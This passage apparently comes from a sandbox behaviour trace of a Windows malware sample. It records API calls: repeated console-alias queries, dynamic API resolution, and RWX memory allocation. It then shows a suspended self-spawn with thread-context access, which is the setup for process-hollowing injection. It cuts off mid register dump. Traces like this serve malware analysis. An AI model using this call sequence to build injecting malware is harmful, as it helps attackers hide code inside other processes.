TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.650] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.651] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.652] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.653] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.653] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.653] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.653] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.653] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0045.653] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0068.082] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0068.083] VirtualAlloc (lpAddress=0x0, dwSize=0x8048, flAllocationType=0x1000, flProtect=0x40) returned 0x20000 [0068.108] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0068.110] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0068.110] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0068.110] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0068.110] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0068.110] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0068.110] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0068.110] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0068.110] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x30 [0068.114] Module32First (hSnapshot=0x30, lpme=0x18eb6c) returned 1 [0068.114] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x30000 [0068.117] LoadLibraryA (lpLibFileName="user32") returned 0x773b0000 [0074.907] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0074.907] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageExtraInfo") returned 0x773eed76 [0074.907] LoadLibraryA (lpLibFileName="kernel32") returned 0x769b0000 [0074.907] GetProcAddress (hModule=0x769b0000, lpProcName="WinExec") returned 0x76a43051 [0074.907] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0074.907] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0074.907] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0074.907] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0074.907] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0074.908] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0074.908] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0074.908] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0074.909] GetProcAddress (hModule=0x779e0000, lpProcName="NtWriteVirtualMemory") returned 0x779ffe04 [0074.909] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassExA") returned 0x773cdb98 [0074.909] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0074.909] GetProcAddress (hModule=0x773b0000, lpProcName="PostMessageA") returned 0x773d3baa [0074.909] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0074.909] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0074.909] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0074.909] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0074.909] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0074.909] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0074.910] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0074.910] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0074.910] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0074.910] RegisterClassExA (param_1=0x18e828) returned 0x20c1bc [0074.911] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x40148 [0075.615] PostMessageA (hWnd=0x40148, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0075.615] GetMessageA (in: lpMsg=0x18e858, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e858) returned 1 [0075.617] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0075.617] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe")) returned 0x45 [0075.617] GetStartupInfoA (in: lpStartupInfo=0x18e77c | out: lpStartupInfo=0x18e77c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0075.617] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe\" " [0075.617] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e77c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e7d4 | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe\" ", lpProcessInformation=0x18e7d4*(hProcess=0x7c, hThread=0x78, dwProcessId=0xeb8, dwThreadId=0xebc)) returned 1 [0075.626] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.627] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0075.627] GetThreadContext (in: hThread=0x78, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x403410, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, 